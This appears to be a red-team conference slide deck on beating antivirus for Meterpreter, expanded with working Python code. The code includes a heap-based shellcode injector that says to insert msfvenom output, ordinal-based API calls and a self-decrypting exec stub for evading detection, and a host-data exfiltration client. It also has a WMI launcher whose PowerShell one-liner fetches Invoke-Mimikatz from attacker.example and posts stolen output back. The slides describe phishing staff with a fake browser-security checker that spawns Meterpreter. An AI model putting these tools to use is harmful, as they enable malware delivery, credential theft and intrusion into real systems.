A Battle Against the Industry - Beating Antivirus for Meterpreter and More

Post on 22-Jan-2017


@ChrisTruncer

Whoami

■ A systems administrator turned red teamer
■ Florida State Seminole
■ Open Source Software Developer
  ■ Veil-Framework
  ■ EyeWitness (Thanks Robin :))
  ■ Egress-Assess
  ■ Just-Metadata

Why am I here today?

■ Share some laughs at Antivirus :)
■ Give a background on stagers
■ Showcase a Veil-Evasion signature bypass
■ Anyone can do this..
■ Talk about developing your own code
■ Case studies on previously developed code

Stagers

What are stagers?

■ Can be referred to as "stage 1"
■ Might be msfvenom, Veil-Evasion, etc. output
■ Goal is typically to inject shellcode into memory
■ Shellcode usually downloads and executes a reflectively injectable DLL
■ ...but it can also do anything you want if you write it :)

What are stagers?

■ Stagers are really used as loaders for your real malware
■ They're designed to be expendable and tiny
■ Don't give away your engineered malware by dropping it to disk
■ Load everything in memory

What are stagers?

■ Any language that has the ability to access Windows functions can be used to write a stager!
■ Pretty cool, and allows us to expand out from traditional "Windows languages"
■ Interacting with Windows functions can seem daunting, but isn't all that bad
  ■ 4 or 5 function calls

Function Calls

Stagers in a Nutshell

■ Allocate memory to store the shellcode being injected, and apply proper memory permissions
■ Copy the shellcode into the allocated memory
■ Create a thread to run the shellcode copied into the process's memory
■ Wait for the thread to complete running before exiting the program

Windows API Calls

■Most stagers utilize VirtualAlloc to allocate memory

■This talk shows an alternate way to allocate memory that isn’t heavily utilized

■It might be a better way to fly under the radar

HeapCreate

■ Creates a private heap object that can be used by the process creating the heap
■ Specify the memory protections
■ Requires the size of the heap that will need to be allocated
  ■ Shellcode length
■ Max size of allocated memory
  ■ I do twice the shellcode length

HeapAlloc

■ Allocates memory from the previously created heap object

■ Receives a handle to the previously allocated heap object

■ Specify the total amount of space that you are allocating for shellcode

RtlMoveMemory

■ Places the shellcode you are injecting into the allocated heap space
■ Needs a pointer to where data (shellcode) will be copied to (HeapAlloc output)
■ Needs a pointer to the data (shellcode)
■ Needs the length of the shellcode being injected

CreateThread

■This function creates a new thread within the current process to execute the data (shellcode) that was injected

■Requires a pointer to the data (shellcode) that will run in the new thread

■Schedule the thread to execute immediately

WaitForSingleObject

■This function is like a blocking call to prevent the program from exiting immediately

■Requires a handle to the thread that was created by the CreateThread function

■ Requires a timeout value of INFINITE (-1, i.e. 0xFFFFFFFF) so the program waits for the thread to exit before exiting itself

Stagers in a Nutshell (Repeated)

■ Allocate memory to store the shellcode being injected, and apply proper memory permissions
■ Copy the shellcode into the allocated memory
■ Create a thread to run the shellcode copied into the process's memory
■ Wait for the thread to complete running before exiting the program
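
The four steps above as one runnable stager, written here as an added example (it is not Veil-Evasion's or the talk's own code). It uses ctypes against kernel32 with the HeapCreate/HeapAlloc/RtlMoveMemory/CreateThread/WaitForSingleObject sequence from the slides. The SHELLCODE constant is a one-byte placeholder (a single RET) and the `k32` parameter is an assumption added so the call sequence can be checked with a stand-in object off Windows; pass nothing to use the real kernel32.

```python
import ctypes
import sys

HEAP_CREATE_ENABLE_EXECUTE = 0x00040000  # heap pages are RWX, so no VirtualProtect call is needed
INFINITE = 0xFFFFFFFF                    # WaitForSingleObject timeout: the "-1" on the slide

# Placeholder payload: a single RET, so the injected thread returns immediately.
# Replace with the "-f python" output of msfvenom (or a Veil-Evasion payload) for a real stager.
SHELLCODE = b"\xc3"


def _prototype(fn, restype, argtypes):
    """Declare return/argument types. Without this, 64-bit Python truncates the
    HANDLE and pointer return values to 32 bits and the stager crashes silently."""
    fn.restype = restype
    fn.argtypes = argtypes
    return fn


def _fail(what):
    if sys.platform == "win32":
        raise ctypes.WinError()  # carries GetLastError() and its message text
    raise OSError(what + " failed")


def run_shellcode(shellcode, k32=None):
    """Heap-based stager: HeapCreate -> HeapAlloc -> RtlMoveMemory -> CreateThread -> WaitForSingleObject.

    k32 defaults to the real kernel32 on Windows; a recording stand-in can be passed in
    to inspect the call sequence elsewhere. Returns the WaitForSingleObject result."""
    if k32 is None:
        if sys.platform != "win32":
            raise OSError("kernel32 is only available on Windows")
        k32 = ctypes.windll.kernel32

    c_void_p, c_size_t, c_uint32 = ctypes.c_void_p, ctypes.c_size_t, ctypes.c_uint32
    heap_create = _prototype(k32.HeapCreate, c_void_p, [c_uint32, c_size_t, c_size_t])
    heap_alloc = _prototype(k32.HeapAlloc, c_void_p, [c_void_p, c_uint32, c_size_t])
    move_memory = _prototype(k32.RtlMoveMemory, None, [c_void_p, c_void_p, c_size_t])
    create_thread = _prototype(k32.CreateThread, c_void_p,
                               [c_void_p, c_size_t, c_void_p, c_void_p, c_uint32, c_void_p])
    wait = _prototype(k32.WaitForSingleObject, c_uint32, [c_void_p, c_uint32])

    size = len(shellcode)
    # 1. Allocate: a private executable heap, initial size = shellcode length, max = twice that.
    heap = heap_create(HEAP_CREATE_ENABLE_EXECUTE, size, size * 2)
    if not heap:
        _fail("HeapCreate")
    buf = heap_alloc(heap, 0, size)
    if not buf:
        _fail("HeapAlloc")
    # 2. Copy: bytes is accepted for a c_void_p argument and is only read here.
    move_memory(buf, shellcode, size)
    # 3. Execute: new thread whose start address is the heap block, scheduled immediately.
    thread = create_thread(None, 0, buf, None, 0, None)
    if not thread:
        _fail("CreateThread")
    # 4. Block until the thread exits so the process does not tear the payload down.
    return wait(thread, INFINITE)


if __name__ == "__main__":
    print(run_shellcode(SHELLCODE))
```

Note that HeapCreate's maximum size is a hard ceiling: if the shellcode later needs a larger scratch area inside the same heap, the allocation fails, which is one reason the slides size the heap at twice the payload.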

Ordinal Values

Ordinal Values

■ Using ordinal values to reference functions is an old-school but effective way to bypass antivirus detection

■Picture an array or Python list containing functions. To reference a specific function, you reference it by its location within the array/list

■Same concept for bypassing AV via ordinal values

Ordinal Values

■ Rather than calling HeapAlloc or RtlMoveMemory by name, why not reference it by its ordinal value?

■ This is still a call to the same function, but just via a different method

■Check out this code

Ordinal Values

■ Simply referencing function calls by their ordinal value vs. name can bypass anti-virus
■ NOTE: Ordinal values can change between both OSs and Service Packs. You will need to target your payload to the OS and Service Pack when referencing via ordinal value.
■ So.... how do we find these ordinal values?

Ordinal Values

■PEView is a free program which lets you inspect PE files, dlls, etc.

■You can use this to load kernel32.dll, search for the functions that you are calling, and obtain their ordinal value

■PEView provides the base 16 value, so be sure to convert it to its base 10 value.
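
The same lookup PEView does by hand, as an added example that is not part of the talk or of Veil-Evasion: a small export-table parser that reads name-to-ordinal pairs straight out of a PE file (already in base 10), plus the ctypes idiom for calling a kernel32 export by that number. `build_export_image` is a constructed PE32+ fixture so the parser can be exercised offline; its ordinals are invented and must not be read as real kernel32 values, which change between Windows builds. On Windows, feed `export_ordinals` the bytes of `C:\Windows\System32\kernel32.dll` instead.

```python
import ctypes
import struct
import sys


def _rva_to_offset(sections, rva):
    """Map a relative virtual address to a file offset using the section table."""
    for va, vsize, raw, rawsize in sections:
        if va <= rva < va + max(vsize, rawsize):
            return rva - va + raw
    raise ValueError("RVA 0x%x is not backed by any section" % rva)


def export_ordinals(image):
    """Return {export_name: ordinal} from the export directory of a PE image (bytes)."""
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    nsections = struct.unpack_from("<H", image, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", image, e_lfanew + 20)[0]
    opt = e_lfanew + 24
    magic = struct.unpack_from("<H", image, opt)[0]
    # DataDirectory[0] (export table) sits at +96 in a PE32 and +112 in a PE32+ optional header
    export_rva = struct.unpack_from("<I", image, opt + (96 if magic == 0x10B else 112))[0]
    sections = []
    for i in range(nsections):
        vsize, va, rawsize, raw = struct.unpack_from("<IIII", image, opt + opt_size + 40 * i + 8)
        sections.append((va, vsize, raw, rawsize))
    exp = _rva_to_offset(sections, export_rva)
    base, _nfuncs, nnames, _funcs, names_rva, ords_rva = struct.unpack_from("<IIIIII", image, exp + 16)
    names_off = _rva_to_offset(sections, names_rva)
    ords_off = _rva_to_offset(sections, ords_rva)
    result = {}
    for i in range(nnames):
        name_off = _rva_to_offset(sections, struct.unpack_from("<I", image, names_off + 4 * i)[0])
        name = image[name_off:image.index(b"\0", name_off)].decode("ascii")
        # AddressOfNameOrdinals holds an index into AddressOfFunctions; the ordinal is index + Base
        result[name] = base + struct.unpack_from("<H", image, ords_off + 2 * i)[0]
    return result


def by_ordinal(dll, ordinal):
    """ctypes resolves an integer index through GetProcAddress by ordinal, so the
    function name never appears as a string in the payload."""
    return dll[ordinal]


def build_export_image(exports, base=1):
    """Constructed PE32+ image with one .edata section: an offline test fixture,
    not a real DLL, and the ordinals it carries are whatever the caller passes in."""
    names = sorted(exports)                      # real export name tables are sorted
    nfuncs = max(exports.values()) - base + 1
    sec_rva, sec_raw = 0x1000, 0x200
    funcs_rva = sec_rva + 40
    names_rva = funcs_rva + 4 * nfuncs
    ords_rva = names_rva + 4 * len(names)
    strings_rva = ords_rva + 2 * len(names)
    strings, name_rvas = bytearray(), []
    for name in names:
        name_rvas.append(strings_rva + len(strings))
        strings += name.encode("ascii") + b"\0"
    data = bytearray(40)
    struct.pack_into("<IIIIII", data, 16, base, nfuncs, len(names), funcs_rva, names_rva, ords_rva)
    data += b"".join(struct.pack("<I", 0x2000 + 16 * i) for i in range(nfuncs))  # dummy code RVAs
    data += b"".join(struct.pack("<I", rva) for rva in name_rvas)
    data += b"".join(struct.pack("<H", exports[name] - base) for name in names)
    data += strings
    img = bytearray(sec_raw)
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x40)                                   # e_lfanew
    img[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<HHIIIHH", img, 0x44, 0x8664, 1, 0, 0, 0, 240, 0x2022)  # COFF header
    struct.pack_into("<H", img, 0x58, 0x20B)                                  # PE32+ magic
    struct.pack_into("<II", img, 0x58 + 112, sec_rva, len(data))              # export DataDirectory
    sec = 0x58 + 240
    img[sec:sec + 8] = b".edata\0\0"
    struct.pack_into("<IIII", img, sec + 8, len(data), sec_rva, len(data), sec_raw)
    return bytes(img + data)


if __name__ == "__main__" and sys.platform == "win32":
    # From 32-bit Python this path is redirected to SysWOW64, which is the kernel32 you actually load.
    ords = export_ordinals(open(r"C:\Windows\System32\kernel32.dll", "rb").read())
    print("HeapCreate ordinal:", ords["HeapCreate"], "->", by_ordinal(ctypes.windll.kernel32, ords["HeapCreate"]))
```

Because the parser reads the file the target will load, generating the ordinal table on the target build (or on a matching VM) is the practical way to honour the OS/Service Pack caveat above.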

Veil’s Approach

How Veil-Evasion Bypasses AV

■ Completely open sourced
■ Can query VT's API
■ Veil-Evasion attempts to bypass AV through a few different techniques
  ■ Obfuscated Code
  ■ Encrypted Code
  ■ Non-standard languages for binaries

Flat vs. encrypted code
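
What "encrypted code" means in practice, as an added example (not Veil-Evasion's generator, which ships AES/DES/ARC4 variants): the flat stager source is encrypted, and what lands on disk is a stub that decrypts it in memory and `exec`s it. The SHA-256 counter keystream here is an illustration cipher chosen so the example needs nothing outside the standard library; the `wrap_source` and `STUB` names are this example's own.

```python
import hashlib
import os

BLOCK = 32  # one SHA-256 digest of keystream per 32-byte block


def keystream_xor(data, key):
    """XOR data with a SHA-256 counter keystream. Symmetric: apply twice to recover the input.
    The only property we need is that the bytes on disk share nothing with the flat payload."""
    out = bytearray()
    for off in range(0, len(data), BLOCK):
        ks = hashlib.sha256(key + off.to_bytes(8, "little")).digest()
        out += bytes(a ^ b for a, b in zip(data[off:off + BLOCK], ks))
    return bytes(out)


# The stub is the only thing written to disk: ciphertext, key, and an inline decrypt loop.
STUB = """import hashlib
c = bytes.fromhex("{ct}")
k = bytes.fromhex("{key}")
p = bytearray()
for off in range(0, len(c), 32):
    ks = hashlib.sha256(k + off.to_bytes(8, "little")).digest()
    p += bytes(a ^ b for a, b in zip(c[off:off + 32], ks))
exec(p.decode())
"""


def wrap_source(stager_source, key=None):
    """Return a self-decrypting Python stub for the given stager source.
    The key travels inside the stub, so this defeats static signatures only;
    anyone holding the file, or a sandbox running it, gets the flat code back."""
    key = key or os.urandom(16)
    ct = keystream_xor(stager_source.encode(), key)
    return STUB.format(ct=ct.hex(), key=key.hex())


if __name__ == "__main__":
    flat = "print('this line is what a flat payload looks like on disk')\n"
    print(wrap_source(flat))
```

The signature the talk goes on to describe was written against a string in Veil's stub, not against the encrypted body, which is exactly the part of this construction that stays constant from payload to payload.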

How Veil-Evasion Bypasses AV

■ Languages that Veil-Evasion supports
  ■ Python
  ■ Perl
  ■ PowerShell
  ■ C#
  ■ C
  ■ Go
  ■ Ruby

How Veil-Evasion Bypasses AV

■ Using a non-standard language (read: not C, C++, or C#) resulted in payloads that immediately bypassed antivirus
■ AV just didn't understand how to properly inspect these executables
■ Example:
  ■ C Flat vs. Python Flat

Ordinal Values

■ Simply changing the language the payload was written in completely bypassed all AV signatures.

Antivirus Signature

Veil-Evasion

■After about 1 year, Veil-Evasion finally had its first signature!

■I was informed about this on IRC and wanted to check it out.

Custom Code

Browser Check Scenario

■ Instead of sending just some random executable when phishing, what if you promise to secure their system?
■ Developed by Hunter Hardman (@t3ntman)
■ Written in C#
■ Custom code, so it bypasses every single AV out there (at least before Hunter made it public :))

Browser Check Scenario

■ This works great for phishing scenarios
■ We target individuals impersonating their IT Security, or just IT staff
■ Warn them about the dangers of misconfigured/old browsers
■ Give them a solution!

Browser Check Scenario

■ Once the program starts, it spawns PowerShell and executes any code you give it
  ■ Meterpreter or Beacon!
■ It's fully functional; once the user tells it to start, they see a progress bar go to completion.
■ Once complete, it lets them know their system is secure!

Browser Check Scenario

■ Delivery is dependent upon the situation
■ We've created websites hosting it over HTTPS to make users think it is secure
■ Created fake "secure file transfer" websites
■ Rarely, we've sent just the executable
■ For our initial access, this has been pretty successful, and the lack of AV detection helps the user trust the program

Browser Check Scenario

■ Currently available for review at https://github.com/t3ntman/BrowserCheck

Enumerator

Enumerator

■ Customer didn't want actual shellcode injection or infection of their endpoints

■Wanted intel collection to act as proof of “compromise”

■I developed a script that would gather host information and would POST the data out over HTTPS to our server.

Enumerator

■ Information gathered
  ■ System hostname
  ■ IP address(es)
  ■ System drives and drive space
  ■ Current user
  ■ Tasklist

Github

■https://github.com/ChrisTruncer/PenTestScripts/blob/master/enumeration.py

■https://github.com/ChrisTruncer/PenTestScripts/blob/master/enum_server.py
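
An added example of the same idea, written for this page rather than taken from enumeration.py/enum_server.py: the client gathers the five items listed above and POSTs them as JSON over HTTPS, and the server side validates what it receives before trusting it. The listener URL and the `ca_file` pinning parameter are assumptions for the demo; on a non-Windows host the drive and task listing fall back to `/` and `ps`.

```python
import getpass
import json
import os
import platform
import shutil
import socket
import ssl
import subprocess
import sys
import urllib.request


def drive_space():
    """Total/free bytes per drive letter on Windows, or for / elsewhere."""
    roots = ["%s:\\" % c for c in "ABCDEFGHIJKLMNOPQRSTUVWXYZ"] if os.name == "nt" else ["/"]
    out = {}
    for root in roots:
        if os.path.exists(root):
            usage = shutil.disk_usage(root)
            out[root] = {"total": usage.total, "free": usage.free}
    return out


def process_list():
    """'tasklist' on Windows, 'ps' elsewhere; empty string if the tool is unavailable."""
    cmd = ["tasklist"] if os.name == "nt" else ["ps", "-eo", "pid,user,comm"]
    try:
        return subprocess.run(cmd, capture_output=True, text=True, timeout=30).stdout
    except (OSError, subprocess.SubprocessError):
        return ""


def collect():
    """The host intel the slides list: hostname, IPs, drives, current user, tasklist."""
    host = socket.gethostname()
    try:
        ips = sorted({info[4][0] for info in socket.getaddrinfo(host, None)})
    except OSError:
        ips = []
    try:
        user = getpass.getuser()
    except Exception:          # no passwd entry / no USER env in some sandboxes
        user = "unknown"
    return {"hostname": host, "os": platform.platform(), "ips": ips,
            "drives": drive_space(), "user": user, "tasklist": process_list()}


def encode_report(report):
    return json.dumps(report).encode("utf-8")


def parse_report(body, max_bytes=1 << 20):
    """Server side: bounded, schema-checked decode of a POSTed report. Rejects oversized
    bodies and anything that is not a JSON object carrying the expected string fields,
    since the listener is exposed to whoever finds the URL, not just your implant."""
    if len(body) > max_bytes:
        raise ValueError("report too large")
    report = json.loads(body.decode("utf-8"))
    if not isinstance(report, dict) or not all(
            isinstance(report.get(k), str) for k in ("hostname", "user", "tasklist")):
        raise ValueError("malformed report")
    return report


def post_report(url, report, ca_file=None):
    """POST the report as JSON over HTTPS. ca_file pins the listener's certificate; None
    trusts the system store, which is fine behind a real CA but not for a self-signed one."""
    req = urllib.request.Request(url, data=encode_report(report), method="POST",
                                 headers={"Content-Type": "application/json"})
    ctx = ssl.create_default_context(cafile=ca_file)
    with urllib.request.urlopen(req, context=ctx, timeout=30) as resp:
        return resp.status


if __name__ == "__main__":
    if len(sys.argv) > 1:                      # e.g. https://listener.example/report (assumed)
        print(post_report(sys.argv[1], collect()))
    else:
        print(encode_report(collect()).decode())
```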

WMIOps

WMIOps

■ Why waste engineering time developing a RAT and hoping it never gets burnt? Just leverage built-in functionality!

■Anything useful for system administration is just as easily repurposed for illegitimate use :)

■Just live off the land!

WMIOps

■ Used WMI much?
■ WMI is installed and running by default on Windows systems since Windows 2000
■ It does require local admin privileges on the targeted system
  ■ But this can make it great for post-exploitation

WMIOps

■ WMIOps - A PowerShell based tool which uses WMI to carry out various actions on targeted systems.

■ Developed in PowerShell - we can load it in memory and execute a variety of different tasks

WMIOps

■ Want to see which users have active processes on a system?

■Might be good to know where you can snag creds!

■Rather than needing to compromise the machine, just run a simple WMI query with WMIOps!

WMIOps

■Now that we know who is on the system, want to run Mimikatz to capture user credentials?

■Traditionally we’d have to compromise it, and load up Mimikatz.

■Why not leverage WMI to do everything in memory without needing the use of a RAT?

WMIOps

■ Invoke-RemoteScriptWithOutput
  ■ Spawn PowerShell on the remote system
  ■ Download the PowerShell script in memory
  ■ Runs the user specified function
  ■ Saves output
  ■ Performs a POST over HTTPS to a user specified IP address

WMIOps

■ WMIOps can do other tasks as well
  ■ Run commands
  ■ Kill processes
  ■ Search for files
  ■ Transfer files
  ■ Etc.

Available here -https://github.com/ChrisTruncer/WMIOps
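
The Invoke-RemoteScriptWithOutput steps above, reconstructed in Python as an added example that is not WMIOps's code: build the PowerShell one-liner (download script into memory, run one function, POST the output), encode it the way `-EncodedCommand` expects, and hand it to `Win32_Process.Create` over DCOM. The URLs and function name are constructed demo values, and `spawn_via_wmi` assumes pywin32 (`win32com`) on a Windows operator box; the decoder is the same transform in reverse, which is what you use when the encoded command shows up in process-creation telemetry on the other side.

```python
import base64

# Constructed inputs for the demo; replace with your own script host and collector.
SCRIPT_URL = "https://attacker.example/Invoke-Mimikatz.ps1"
FUNCTION = "Invoke-Mimikatz"
POST_URL = "https://attacker.example/output"


def remote_command(script_url, function, post_url):
    """PowerShell that loads a script into memory, runs one function, and POSTs the output.
    Nothing is written to disk on the target; the script lives only in that powershell.exe."""
    return (
        "IEX (New-Object Net.WebClient).DownloadString('%s'); "
        "$o = %s | Out-String; "
        "(New-Object Net.WebClient).UploadString('%s', $o)"
    ) % (script_url, function, post_url)


def encode_command(ps):
    """powershell.exe -EncodedCommand takes base64 of the UTF-16LE script text."""
    return base64.b64encode(ps.encode("utf-16-le")).decode("ascii")


def decode_command(encoded):
    """Inverse, for reading -EncodedCommand values out of Win32_Process.Create or Sysmon event 1 logs."""
    return base64.b64decode(encoded).decode("utf-16-le")


def powershell_cmdline(ps):
    """Full command line Win32_Process.Create will launch on the remote host."""
    return ("powershell.exe -NoProfile -NonInteractive -WindowStyle Hidden -EncodedCommand "
            + encode_command(ps))


def spawn_via_wmi(host, username, password, cmdline):
    """Launch cmdline on host with Win32_Process.Create over DCOM (local admin on host required).
    Uses the WbemScripting COM object through pywin32, an assumed dependency (pip install pywin32).
    Returns (ReturnValue, ProcessId); ReturnValue 0 means the process was created."""
    import win32com.client  # Windows only
    locator = win32com.client.Dispatch("WbemScripting.SWbemLocator")
    svc = locator.ConnectServer(host, r"root\cimv2", username, password)
    params = svc.Get("Win32_Process").Methods_("Create").InParameters.SpawnInstance_()
    params.Properties_("CommandLine").Value = cmdline
    result = svc.ExecMethod("Win32_Process", "Create", params)
    return result.Properties_("ReturnValue").Value, result.Properties_("ProcessId").Value


if __name__ == "__main__":
    cmd = powershell_cmdline(remote_command(SCRIPT_URL, FUNCTION, POST_URL))
    print(cmd)
    print(decode_command(cmd.split("-EncodedCommand ")[1]))
```

Two things worth noting from the defender's side: the parent of that powershell.exe is WmiPrvSE.exe, which is a stable hunting pivot regardless of what the encoded blob contains, and the blob itself decodes to the plain script, so encoding hides nothing from anyone who logs command lines.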

Thanks! Any questions?

Reach out to me!
■ @ChrisTruncer
■ Chris@Christophertruncer.com
■ https://www.christophertruncer.com
■ https://www.github.com/ChrisTruncer